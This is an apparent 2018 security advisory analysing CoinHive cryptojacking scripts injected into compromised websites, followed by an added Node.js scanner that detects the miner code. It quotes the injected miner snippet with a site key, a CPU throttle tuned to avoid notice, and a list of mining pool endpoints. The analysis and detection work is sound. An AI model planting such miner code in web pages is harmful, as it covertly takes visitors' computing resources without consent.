A few things about CoinHive intelligent web mining - vulnerability warning - the black bar safety net

ID MYHACK58:62201891198
Type myhack58
Reporter Anonymous
Modified 2018-08-18T00:00:00


Mining has become one of the main ways for black hats to make a profit. Recently, while browsing the Internet, some websites were found by chance to have been compromised and to be running web mining. Unlike conventional mining carried out by a virus on the operating system, web mining mainly works by planting a malicious JS script on the site's pages, so that visiting the site triggers the mining operation. Most web mining today is done the CoinHive way. In typical mining, the user actively runs a miner client built in C or another language to compute hashes on the CPU or GPU. In front-end mining, the CPU or GPU is used through the user's browser, passively or actively, with or without the user's knowledge.

0x1 Phenomenon

When visiting the malicious site, CPU usage spikes; after closing the site, it returns to normal levels.

0x2 Source code analysis

Viewing the page source reveals part of the mining code: after a simple check that the browser is not a mobile browser, it starts the mining operation.

The browser process consumes a large amount of CPU resources. Inspecting the browser process, traces of the mining address can be found in its memory.

The main reference to the mining code is shown below. The details are in the referenced JS script; it uses only 70% of CPU resources.

    <script src=""></script>
    <script>
    var miner = new CoinHive.Anonymous('Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt', {throttle: 0.7});
    // Skip mobile browsers and users who opted out in the last 14400 seconds
    if (!miner.isMobile() && !miner.didOptOut(14400)) {
        miner.start();
    }
    </script>

Jgv7noixIKHmJ7IIhAR9jySAwG3ZU8vt: the wallet address in CoinHive.

throttle: the browser CPU threshold. When it is adjusted to a suitable value, it is very difficult for the user to notice that the browser's hash power is being abused.

In the coinhive.min.js source, the mining script uses WebSocket to communicate with the mining pool. Some of the mining pool nodes are as follows:

    wss://ws001.coinhive.com/proxy
    wss://ws002.coinhive.com/proxy
    wss://ws003.coinhive.com/proxy
    wss://ws004.coinhive.com/proxy
    wss://ws005.coinhive.com/proxy
    wss://ws006.coinhive.com/proxy
    wss://ws007.coinhive.com/proxy
    wss://ws008.coinhive.com/proxy
    wss://ws009.coinhive.com/proxy
    wss://ws010.coinhive.com/proxy
    wss://ws011.coinhive.com/proxy
    wss://ws012.coinhive.com/proxy

The mining script allows automatic adjustment of the number of threads:

    this._throttle = Math.max(0, Math.min(.99, this.params.throttle || 0));
    this._stopOnInvalidOptIn = false;
    this._waitingForAuth = false;
    this._selfTestSuccess = false;
    this._verifyThread = null;
    // Automatic thread adjustment, re-evaluated every 1e4 ms
    this._autoThreads = {
        enabled: !!this.params.autoThreads,
        interval: null,
        adjustAt: null,
        adjustEvery: 1e4,
        stats: {}
    };
    this._tab = {
        ident: Math.random() * 16777215 | 0,
        mode: CoinHive.IF_EXCLUSIVE_TAB,
        grace: 0,
        waitReconnect: 0,
        lastPingReceived: 0,
        interval: null
    };

0x3 Solution

1. View the source code of the page and search for keywords such as CoinHive and Miner to quickly locate the affected page, then use Notepad or a web editor to remove the key mining code.
2. When visiting small movie sites, pay closer attention to your CPU usage.
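The keyword search from step 1 of the solution, as an added example that is not part of the original article: a Node.js scan that reports the line of each CoinHive indicator in a page's source so the injected code can be located and removed. The sample page, its script host and the site key are constructed placeholders, and the rule names are this example's own.

```javascript
// Added example: locate CoinHive miner code in page source (step 1 of the solution).
// SAMPLE_PAGE is constructed; the script host and site key are placeholders.
const SAMPLE_PAGE = [
  '<html><head>',
  '<script src="https://cdn.example.invalid/coinhive.min.js"></script>',
  '<script>',
  "var miner = new CoinHive. Anonymous('PLACEHOLDER_SITE_KEY', {throttle: 0.7});",
  'if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start(); }',
  '</script>',
  '</head><body>Movie list</body></html>',
].join('\n');

// Patterns derived from the snippets quoted in the article. \s* tolerates
// whitespace placed around dots, which would defeat a plain string search.
const RULES = [
  { rule: 'loader-script', re: /<script[^>]*\bsrc\s*=\s*["']([^"']*coinhive[^"']*)["']/gi },
  { rule: 'miner-constructor', re: /new\s+CoinHive\s*\.\s*\w+\s*\(\s*["']([^"']+)["']/g },
  { rule: 'throttle', re: /\bthrottle\s*:\s*(\d*\.?\d+)/g },
  { rule: 'pool-websocket', re: /(wss:\/\/ws\d+\.coinhive\.com\/proxy)/gi },
];

// 1-based line number of a character offset, so findings map to editor lines.
function lineOf(text, index) {
  return text.slice(0, index).split('\n').length;
}

function scanPage(html) {
  const findings = [];
  for (const { rule, re } of RULES) {
    for (const m of html.matchAll(re)) {
      findings.push({ rule, line: lineOf(html, m.index), value: m[1] });
    }
  }
  // Follow each variable that holds a miner object to its start() call,
  // instead of flagging every unrelated .start() on the page.
  const assign = /(\w+)\s*=\s*new\s+CoinHive\s*\./g;
  for (const a of html.matchAll(assign)) {
    const start = new RegExp('\\b' + a[1] + '\\s*\\.\\s*start\\s*\\(', 'g');
    for (const m of html.matchAll(start)) {
      findings.push({ rule: 'miner-start', line: lineOf(html, m.index), value: a[1] });
    }
  }
  return findings.sort((x, y) => x.line - y.line);
}

console.log(scanPage(SAMPLE_PAGE));
```

An empty result only means these patterns were not found in the source that was scanned; scripts loaded from other files need to be scanned as well.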